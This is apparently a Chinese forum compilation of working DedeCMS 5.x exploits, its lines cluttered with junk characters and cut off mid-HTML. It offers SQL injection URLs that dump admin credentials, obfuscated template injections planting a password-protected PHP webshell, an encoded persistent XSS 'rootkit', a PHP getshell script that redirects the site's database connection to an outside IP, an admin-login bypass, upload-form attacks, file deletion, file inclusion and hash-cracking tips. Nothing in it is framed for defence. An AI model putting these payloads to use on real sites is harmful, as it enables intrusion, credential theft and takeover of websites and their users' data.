|
|
6 b, z: `. P& Y3 M7 |Dedecms 5.6 rss注入漏洞
3 n6 I3 s5 Y: }7 w, Yhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
4 B. w1 J6 Z/ N0 B$ n4 r2 t! o( @. _$ r- E# C! z
; L6 ?# ]6 G) b- {& N" T0 J8 [
& Q, l+ R" }1 o& h4 k$ c8 Y
8 ~& ?! p- K3 m4 s1 V' N0 F. h8 q( V8 U6 [2 E
. f3 R" l$ }. X9 q2 K0 S3 y. A1 P8 x* r3 t& M% d/ O
x ?' i$ }0 Q0 uDedeCms v5.6 嵌入恶意代码执行漏洞
. c, T; h* M3 W+ t! A注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}( _; Y3 K* B% a+ }/ l9 w. v
发表后查看或修改即可执行: h: M, t- R+ K$ l8 Y9 B' a
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}+ G \" q% ]4 s( T. K
生成x.php 密码xiao,直接生成一句话。
8 m! K, v) _8 L5 J$ a* f
$ S' k/ u/ \ E# c# `0 ?6 ~, ~3 Q: ] M, N, o& U
. ^2 ?$ c+ m/ ]# H( o- ?
6 z+ X6 N( x' s) {; V. f) ^% Y5 q( N: i; C
; O* k9 }$ {1 o s" |
) A+ Y( y+ t5 D$ C( Z* g6 d* t+ Y6 R/ L' }0 D1 a, I5 B$ J. w
Dede 5.6 GBK SQL注入漏洞; d1 |$ U! t7 T- p4 ^* N% @+ s
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
: d& d* l. s# A; _http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe# }, N% @4 a* E' \
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
" H9 v* f) U5 x! Z; e2 z
0 ]9 O- m+ e1 C( ]6 L& c2 ^2 i1 U- Z M6 ?
$ @3 {' q; y" Q8 \% M _& S8 l& S; R4 W' I) n3 y0 ^: W* _
$ G7 o+ `" Q; H
& K& K+ C6 t% b4 N7 r. Z1 l& f7 T' @! E8 H% q h
5 [# A. e: k! l4 [( q! Y& N
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
. T) f& C# E$ Y5 V8 i8 lhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
* z* G9 y7 I) a1 F: {" o" C; m% ~) I; L( z
6 R; l% ?$ l" a& p9 T c& W5 R) o
, k. c$ m; }8 }' w! ^
& B% [1 N) C2 \- J$ ^( _- [
/ p. C/ T* w- s4 L6 |
$ g( A6 i3 i7 i/ y* @DEDECMS 全版本 gotopage变量XSS漏洞/ O, [9 Q! R1 e
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
0 [# ^3 r$ p9 o* u( `+ Ahttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="- Z0 k# g9 S9 t0 B# ]5 F
. Y. D; W. z, |! c+ e
9 W; d3 Q7 R0 j$ L; c% b) p) W
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 * o' L& S; e4 @! M
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
[- e$ d# d. q8 Q
4 \' |: J# q# v. Y) r, O4 H- A& ~. ^
http://v57.demo.dedecms.com/dede/login.php6 z. `8 Z/ j7 B
3 Y" N9 g& s- o3 _8 A3 ^1 i; c7 f4 m; D$ q% [, s1 o
color=Red]DeDeCMS(织梦)变量覆盖getshell
: }; J+ V! B) J, K: M4 E#!usr/bin/php -w& Z- R7 g6 A/ `' U. a, A& j
<?php
, _4 K/ K0 u7 L# Serror_reporting(E_ERROR);2 \0 b1 W2 v9 ?' K$ @% O! d
set_time_limit(0);
) k4 P( ~6 |9 P+ V6 _* e% Yprint_r('+ w s4 R {% H
DEDEcms Variable Coverage
0 b% H6 b8 D* o1 nExploit Author: www.heixiaozi.comwww.webvul.com* i# Z. C& t; N x9 @ J
);
* L3 H# X, [1 `# Xecho "\r\n";
# V+ j9 o# {( `/ n, Y$ F$ n- gif($argv[2]==null){
) ]; H( J. y# _5 S5 [7 Nprint_r('* B& x' \" ^. G) N6 n7 P8 c; m: _4 S- `
+---------------------------------------------------------------------------+, m7 L4 s. s) \! l. V. u, W0 r8 f3 c9 k
Usage: php '.$argv[0].' url aid path
( P$ ^% f5 K$ E* y7 Jaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/: B8 P! K3 \5 `. O& ~( a: J9 G
Example:
( Y% L8 B$ r# @+ ?. @php '.$argv[0].' www.site.com 1 old* }3 ]$ N9 H, B3 c3 B) K; U2 t
+---------------------------------------------------------------------------+
' \( h0 c9 U) J' X @2 R! \' [');
9 G0 c/ I f; h0 Y$ ~# hexit;7 b8 _. O( J4 c9 `
}
" X8 H, O4 B; l: f# G$ x$url=$argv[1];
, U3 k { p) E+ q) D9 B$aid=$argv[2];
2 v5 |9 O4 Y. o# i7 j {$path=$argv[3];* l1 T' S" H% c3 {) N% W* {
$exp=Getshell($url,$aid,$path);
& X6 w& M7 t* D. tif (strpos($exp,"OK")>12){2 A5 _; p; h+ k: k, T) e2 N5 h% s
echo "3 s5 Z" H7 F% |9 C5 @
Exploit Success \n";6 P5 ]: o W% u
if($aid==1)echo "
# L. u% T6 ~- \$ D" ^) OShell:".$url."/$path/data/cache/fuck.php\n" ;
7 J+ I. s7 L% I( K- H- I/ ?9 S0 p( U( Z& K" P7 d: }) E* t
3 J1 V3 K; R1 a
if($aid==2)echo "
* ^8 O& H7 G; yShell:".$url."/$path/fuck.php\n" ;
2 P! a2 t2 z+ ~$ c) m: D$ _6 [ @( z" w; N/ u7 v
( f- [& Q7 I N; b# J
if($aid==3)echo "
* p' } D) C" B6 ?( z) O. `6 f$ zShell:".$url."/$path/plus/fuck.php\n";
. k0 m( J; ?6 c" g/ {. d7 N: v/ [- A4 [8 V, f
7 D, w. J6 g& W0 t. U! M}else{
5 o( s6 f, M" n& f `. a, Z) secho "1 N8 w! Y* v K1 v3 Q4 y. z
Exploit Failed \n";
3 y5 D) m' f& e8 y3 [0 m$ U}+ S* o7 T0 j( y
function Getshell($url,$aid,$path){5 a. }2 V) n) E' U N% f
$id=$aid;
! m! o7 Y! f+ b! Q$ Z$host=$url;* P0 m8 v! \# o1 w& Q0 L+ ~+ x* w1 _2 k
$port="80";
3 k+ j0 ]" e4 }$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
1 G2 l0 x J* u9 e2 H9 g6 G" h$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
. d4 ?* v# X, J0 Z$ U, C/ J$data .= "Host: ".$host."\r\n";/ H/ @" J; A# b# Y5 t- I4 ?
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
, t! [- C0 R4 m, y+ C+ R2 b! d$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";9 a/ ]. E1 z! F: ~4 s
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";3 Y0 P( ]; r" N/ N8 N( P/ v$ m+ E
//$data .= "Accept-Encoding: gzip,deflate\r\n";
, `% q9 P3 j- g" m7 Z$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";& k5 Y g2 c c" i" W
$data .= "Connection: keep-alive\r\n";/ G7 ]! g2 m" P _5 x( Z& x
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";& m* E# Y8 o: i* W. L/ B- L# F
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";$ z6 S( t8 _7 H8 L% I
$data .= $content."\r\n";
6 K$ v2 p+ j& r6 r- ?$ D$ock=fsockopen($host,$port);
* f& f3 E7 V7 i; ?- `- l* c. M: dif (!$ock) {
; s5 ^5 |, m( \9 D1 m+ U5 cecho "
! K( l. J1 ~% Q/ ~No response from ".$host."\n";: L2 f4 R1 F: B
}/ X1 Q D( I/ V+ _& G
fwrite($ock,$data);$ H& r% V# c# ]
while (!feof($ock)) {8 t2 U& D8 o( M2 d! a
$exp=fgets($ock, 1024);# \4 W' T- D* u) }+ i
return $exp;
7 O. }' k6 f1 j& C" ~: P}) N- ]/ d& k% V: Z( x
}: [( L1 M8 Q: j
& G3 M) x, n+ J+ c" U# n
- x# b2 D. }" F" t: p" X4 w' p?>
3 b) _5 J, d* S, a! e* L+ i, ^3 ~4 z: P% K+ q& F2 \$ @
0 L& m$ S0 b5 u9 i
& r5 B3 D+ [" p4 S, z. E0 c- O" n) b$ a- K
/ \) @1 i' J9 c1 R4 [* |
/ v0 R* ]1 H/ D/ k
, D9 E" O2 c( O1 {6 h# v; d/ D
% O3 R* G6 b" i, L, v" o* p7 _: I& l; t
% r/ E b9 P( `2 _) H; Y2 ]5 f5 z/ `
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)/ `& T$ g* w9 m D
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
: a' ^0 t7 U$ h+ f4 x8 ?- k: ?% }+ H7 G
! d/ T, \1 z- J% |) ]把上面validate=dcug改为当前的验证码,即可直接进入网站后台/ g, B6 k4 s8 U- o5 [- `5 `# l
4 P) Y4 Y" v; x3 _5 ^0 B) g4 w2 \
# H. L0 d" }1 U( C* k3 V Q
此漏洞的前提是必须得到后台路径才能实现' c3 U' U# s7 q: u
! W2 l) s5 R; d5 Q5 E4 B% F+ j8 h" W
6 U# | K0 _% Y( [0 \# Q. @% ~1 C
8 y8 J* u' V P
& q. F. j! Y1 P# t
9 H' j0 X( V$ I! L; U% W8 h$ \( {4 }: U! `5 @! p* M/ Z, N6 f
$ o2 l% s1 K: O" L/ f) v/ h. Y
: U- O6 x4 _" R6 uDedecms织梦 标签远程文件写入漏洞, ?2 E# `+ e+ R6 J/ W% H( g$ z
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
' _# t: u/ O( R. ]; @. P7 w; v! @1 V4 b
. V* y" k t; D
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
. w a( y$ n. m: ^# ^- z3 V0 H<form action="" method="post" name="QuickSearch" id="QuickSearch">
; y h- p- i8 f3 o- V' w<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
6 c; q- x$ C" i3 V2 T/ Q6 v6 \<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />3 {; C+ M$ g* D l: i& [
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
; y; q7 @& x8 n/ B& `1 `<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />3 X) e5 O+ r7 t" G
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />! z7 R5 B' M! Q0 m" i
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />1 l/ F4 R4 d" ]% s- H' m R; x
<input type="text" value="true" name="nocache" style="width:400"># Z4 i2 K" j4 D" z5 ?
<input type="submit" value="提交" name="QuickSearchBtn"><br />1 ?9 {% J: J) [1 v0 d1 m6 K$ a
</form>) W, O5 o* q7 d! s; b% e! Y2 h
<script>" x% ^+ P* d0 s5 _ j x5 {9 V6 ]) Y
function addaction()
! Q, q, w! M- Y3 k" ?, ^+ j W{
: V. T& C8 P% [: odocument.QuickSearch.action=document.QuickSearch.doaction.value;
) q6 \# _3 r8 S5 Y9 G9 D, r# ]. Y# O}+ K! O* |. ]. r3 r9 R. R4 g* V3 D
</script>! t) v5 I* e8 U% G; C i) A
" h$ J6 B! R. Z
- G0 p$ M: s1 z! @- B3 S
7 t: y0 ]5 U/ V6 z/ A1 n) g
% Z8 t9 M+ Z0 k
; m {! F; c4 f6 f j* J% Z
. D' P/ h6 \7 @ m" |1 l$ Z8 I
' _7 G: H% {1 a5 |" r
6 [2 E- r. Y" b$ X# X X: O. n
7 p" i! m. A) J+ |$ }8 ]
. R# c3 p/ k6 V" A4 ?DedeCms v5.6 嵌入恶意代码执行漏洞 G+ |6 r( l; ^
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
+ q+ g) e7 H! b4 S/ ma{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}; h! [' n9 s- o# J3 @; Y
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得0 M. V+ E' l+ @; y6 l
Dedecms <= V5.6 Final模板执行漏洞: S# X4 H& J8 s( V. R5 `( r* J
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
/ H$ X# K) ~8 p5 M8 _6 W) P2 f7 Xuploads/userup/2/12OMX04-15A.jpg
- d. c" D: k" A6 S2 Y$ m% W& c8 N9 T4 v4 `3 R g
, |2 y5 t3 Z7 B
模板内容是(如果限制图片格式,加gif89a):
( u7 n5 D8 R0 |) Z) P$ p2 b{dede:name runphp='yes'}
4 ^& {# y9 N2 D* P1 T8 v3 E$fp = @fopen("1.php", 'a');
4 k5 R* u8 Z- i+ V@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
, Z0 W' d( Q2 }@fclose($fp);4 j) _" K& L: Z
{/dede:name}
. d. S" O3 M1 E" o) g0 ?3 a7 N4 ~; F2 修改刚刚发表的文章,查看源文件,构造一个表单:
) _% l; S! z/ f t9 E- |7 `0 K<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
4 \: a! `2 D" R' i9 D8 ^# L/ T<input type="hidden" name="dopost" value="save" />
M/ A$ O& X8 v4 w4 G$ @<input type="hidden" name="aid" value="2" />7 h, a! A5 Y% I
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
1 u* Y6 @" \ K: V0 G, ^<input type="hidden" name="channelid" value="1" />
/ A( k Q- u) s# H/ ~' Z& ?1 {<input type="hidden" name="oldlitpic" value="" />
9 P% A6 \8 k V3 z u+ e7 j<input type="hidden" name="sortrank" value="1275972263" />7 E9 @) b3 N- ~2 p% [0 h
* s! H( }2 F4 d
L( e2 ~) P. v6 i<div id="mainCp">
; u' w' a) W3 M<h3 class="meTitle"><strong>修改文章</strong></h3>' H3 n8 \* U; d4 N# X2 C
) ]0 m# x# R# @& A5 |
# K6 g% t" [! n8 z) E1 B<div class="postForm">
v, B2 F3 |1 i$ ?. r<label>标题:</label>
7 T, X, q" L6 S# s<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>1 S" d& l% s- b; a1 D
, r1 G: Q& T+ T; y- Q0 T% ~
9 @( {+ H' l. g, F1 J- U<label>标签TAG:</label>
5 w0 _+ G- |. f4 j( f9 K" V0 Z<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
& C' ^( k* r6 c* U8 |# _, \( z( f; S1 {& A) h H+ \
: @# H; ~0 G% r. l<label>作者:</label>+ p# P# I/ M( d8 g$ {% p
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>; H! t1 D1 \: Y
7 ~( ]8 w3 u5 L# r. W/ o0 O
/ Y& ^7 L6 _1 g5 A: g* q8 T; Z g7 H
<label>隶属栏目:</label>
4 Y; u2 a9 o% |* n9 w7 V2 I<select name='typeid' size='1'>/ ?1 P9 z# R* x: P) Z% _
<option value='1' class='option3' selected=''>测试栏目</option>
+ s! m$ {9 Z+ R( P</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
7 |# @- n: Z5 b
! _1 G! e, V! R9 L* g+ H* [- s% a) `9 Y
<label>我的分类:</label>
, w* M J7 _3 _# [7 g, ^<select name='mtypesid' size='1'>" R3 I2 Y$ i+ R. K
<option value='0' selected>请选择分类...</option>( T, X1 e! p; X5 R; ]
<option value='1' class='option3' selected>hahahha</option>
( G& a j* j, P: S* n8 J</select>
$ L: ]7 r& ?% U3 o5 I3 a; V. t+ r: A# y
; M1 f3 \' D/ P$ {9 Q: y3 f<label>信息摘要:</label>
) V7 ~3 U$ C3 z. W<textarea name="description" id="description">1111111</textarea>
) |8 n) u2 K& G+ o" R. ^4 `(内容的简要说明)" F: R+ m* \& V; u# o$ _
/ r2 r* M1 P0 [+ l5 q/ _. u7 ]7 A# y
( V$ C! h, r& E: _# d9 m<label>缩略图:</label>
+ K4 I" _/ k, |2 [<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
) E! h6 H* \6 ^" _; S0 A' \0 q6 B$ Z4 D
/ V% s/ Q6 k) _! ~ s' }% b
<input type='text' name='templet'
$ t% U9 q( \ M- m7 y2 b# }; @value="../ uploads/userup/2/12OMX04-15A.jpg">9 E/ r. a0 L; s- s. F/ O
<input type='text' name='dede_addonfields'8 ?. Q+ _: |) }& Q
value="templet,htmltext;">(这里构造)
! m: Z: U* h+ E0 e- {</div>
- L7 V$ ]1 d4 W( l; `2 y% w( n9 U& F1 X1 A$ Z, u5 s& H7 P& T
, @* v' b; ?" o& d<!-- 表单操作区域 -->
3 `4 b+ U& Y G1 l5 `& g. F<h3 class="meTitle">详细内容</h3>* ?5 |) W9 l/ g' A! r* P% ?
?- @, \' Y0 ~. M7 Q
- l5 F: ~& t: `+ ?0 E s<div class="contentShow postForm">. |+ C# J1 |; L) o# F# C5 e* f
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>3 V3 t* ~/ d$ F* v
8 q6 ?, ~1 H& r2 F' R! m4 C1 G- A+ C1 T' m) g* i* s, |
<label>验证码:</label>
. A- @3 {4 K; R4 w. D8 r" @; h" [8 D<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />$ P' }4 D, W1 ^" v& E
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
% B5 o" j% t: p0 u" u$ \$ M" R; O5 H" Q1 c0 F
( q% F/ M# G. f5 V ?& r& \<button class="button2" type="submit">提交</button>
7 U" Y, O1 h. Q! i+ v0 y$ D<button class="button2 ml10" type="reset">重置</button>: P; Q: O6 } R0 Y8 m9 k
</div>6 g: i& H2 c. u- L: N
# t, }7 H$ x1 { h; V- M/ K" s! h: F
8 l7 K6 Q; ^& L6 S8 p: F</div>( D( m4 \, ^/ {8 S- k* r. X3 x
. I# i5 I: x2 |/ P
7 f) O' c: i0 p7 O' D</form>/ W& d! I* ]6 B1 m7 o7 P
4 U# n K. w7 s6 D/ d
2 b# a) U! ?/ T, Y/ G
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:' B, X9 c# a. S$ X* g4 {2 P) l
假设刚刚修改的文章的aid为2,则我们只需要访问:' w# S% ^) v# O1 S+ G
http://127.0.0.1/dede/plus/view.php?aid=2
3 F( W3 o6 b) E8 j即可以在plus目录下生成webshell:1.php+ I0 O. `: ?, P8 n0 [
9 p; e6 k8 x( v+ i
& ~* C0 N( [# v: G9 B: i
/ G2 @9 V, z5 `& ^. H# m( A P2 [3 S
2 h; Q2 U" C4 U
: T h8 S0 u% }) ~' D/ l
0 g/ T5 \$ t$ R# z1 j& g
7 ?! W# C* _% a1 h' ^
# T: \1 W2 A& o* N6 q$ a0 H" c6 u- g Z* O% ~; C
8 ?# t+ ]* B9 b. i$ r C6 R1 Z8 S5 T
M+ b1 f; p8 @" h% SDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)! W4 _) H6 G( D K9 M
Gif89a{dede:field name='toby57' runphp='yes'}) {9 m* R: X- `# Z* [
phpinfo();
6 e, C6 @! O. y' d( o4 \9 Q& W{/dede:field}
) x8 w8 M- r3 u1 l% ~, @8 ^, J保存为1.gif
1 C9 Z- E7 g" F$ F- G<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
5 g$ }4 C# r/ I( m9 U( @9 \$ ~<input type="hidden" name="aid" value="7" />
0 [' |& d' M" J0 ~: M' j<input type="hidden" name="mediatype" value="1" />
( Z; I( a' t4 x& k+ k<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
0 Z! a; F1 H/ a/ c3 W<input type="hidden" name="dopost" value="save" />
: v% j6 n1 \7 A' P) [$ L<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
( X6 }6 f- ?* v& Q- {& r<input name="addonfile" type="file" id="addonfile"/>
: C" T- H& U4 @3 e<button class="button2" type="submit" >更改</button>
1 Q7 i4 \. j7 O</form> 2 ?( i# |2 ^# f: i3 {$ c
' q- T- m( }/ m6 z
! l# D9 u: D0 J9 W4 M- a构造如上表单,上传后图片保存为/uploads/userup/3/1.gif, G, |9 o' D6 Y4 m& m1 f
发表文章,然后构造修改表单如下:
6 @6 y- ^4 e% q, N) n# Y3 e! G" k( ?# l4 x H* O
1 Q5 ?, t: S* L; V3 |/ L7 H<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
4 i" s& z' E" h<input type="hidden" name="dopost" value="save" /> * P7 D* g8 s0 o6 @: w4 \6 W7 z+ L
<input type="hidden" name="aid" value="2" /> & J: j& O3 [& G* A: F
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
2 { \% W* @8 q) G5 S+ }5 K. ]<input type="hidden" name="channelid" value="1" />
" y/ ^8 \' W# c& |<input type="hidden" name="oldlitpic" value="" />
+ U! F" o2 |$ a<input type="hidden" name="sortrank" value="1282049150" />
# o* m) d) H: x+ I<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 2 o( h6 }6 N U6 Y2 |; e
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
: ]' c5 g p& {' q<select name='typeid' size='1'>
- Q5 P5 w- X9 D* E( e4 l& W<option value='1' class='option3' selected=''>Test</option>
* y& V) j9 c* D8 o* X<select name='mtypesid' size='1'>
5 g8 z, G, P" @2 e* k5 L6 p<option value='0' selected>请选择分类...</option> : B, f* |: h7 F5 H) a% M7 w* ^: p
<option value='1' class='option3' selected>aa</option></select> ; Y+ {; T. I5 M7 I0 Y3 R7 N, ?
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 0 _8 \/ d: B: O8 S
<input type='hidden' name='dede_addonfields' value="templet"> R8 u1 N; J, H" t- X B" t
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> , |2 F# W' Z3 [
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> , F% X% g/ ]0 U0 F" }$ b2 r6 R
<button class="button2" type="submit">提交</button>
& r8 G4 A @* a' i$ o- U% K</form>
$ x1 _$ @( l4 l. }9 A- E9 V% i4 d0 U( m- J. N4 z+ C% j& p
. s, W0 ^# b" C- n/ g5 W
0 P3 M( l( |% q/ q7 D7 y+ M0 k) e( N" x: o7 E* n7 S
3 C8 T6 E9 X6 ?' l" f, }* C" F. s* v9 R6 K- j
; U5 Z4 ~- l9 U1 l
- Q. V3 M/ S1 s2 ?7 Z/ |1 O% Q' m
7 I: h" R' l5 y3 c& J' X6 r
$ E) p R5 R- _1 q: i4 Z- z3 i; { a* `/ C4 T0 x, w
3 l+ g' y; _. L W/ c& n! Z& `9 L8 B
织梦(Dedecms)V5.6 远程文件删除漏洞4 l9 L- g. n# H% g7 {4 a! {+ M7 g
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif% s, a: b; R$ D' o* h$ @! I
& g# _" o7 }% D, R3 d
2 ]; L- c$ N7 B+ W( H( U! K
- T4 O; {2 [" _2 D
8 C* v A- }2 ^' S9 l3 P5 o5 x! s
- `9 [9 X6 M9 ?4 W5 O# \6 M1 w% ]
8 Y! C; j: y$ I# i8 m
! M/ h. G" ]' M& E' [, l m$ z! V& h7 [( x" T7 Q6 }# h* ~
+ z$ e s7 H) c2 c: K5 n
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
t; z; A" x' ^9 jhttp://www.test.com/plus/carbuya ... urn&code=../../
% ~: ], {1 y+ f0 X t" s1 ?2 v
3 Q8 A T& I/ |3 V* N3 n0 S3 ], Z8 `3 Y x, T
4 d6 l* y# e) ]) E6 _" x
/ c3 Z) b, q6 [: K$ @$ Z/ e. S) \+ r
# d! w l& w+ W4 n
: m9 X) }( z- H
- t; I; J! W4 E' H9 Y+ r8 X
/ C1 ^# D! ?% ?9 j$ p" d6 }' O( _1 o- q# S9 D
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 # ~* A3 Q2 t! ?0 ?) w( R
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
; R4 Q* J/ j+ [密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5' R9 V2 D9 z: _( F
. P& @$ d4 b; H% `. \! w: [# Q0 i2 k9 G) h' V
- p* `5 j+ G: i- h7 ] c( S _+ j. S
% a( |( z$ k# `: f
- G9 d3 b" J* R
% e; m5 d, g- o3 l# @7 B0 \& e' h
& ^$ a3 W1 }0 q! J
' m+ k& b( E$ {: X |& T# a% z) D) l( z! L0 U
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
' |) a8 S: O% N" P9 ihttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
' Y0 F0 K" S$ U3 w, z2 Y; y2 J! x+ R0 w, z* h- o
% ~$ @6 l" o5 [- t* T
/ O5 \6 T! x' h& r; V# q
, b/ p1 k% M* S. Z1 w& t2 x* r8 G' Y0 _' Q5 m
( S- ]0 t1 e# X
& _( a; z7 W: ~# H% h3 n+ `% M0 \
+ L {( ?- o0 e8 K
: A, Q8 j% G1 b' e, v7 M
+ W( X+ g" F. E4 f! p织梦(Dedecms)select_soft_post.php页面变量未初始漏洞0 u5 T( U- F2 W
<html>
; W8 l( `7 I) h& W<head>" X) V9 B" l: _' D
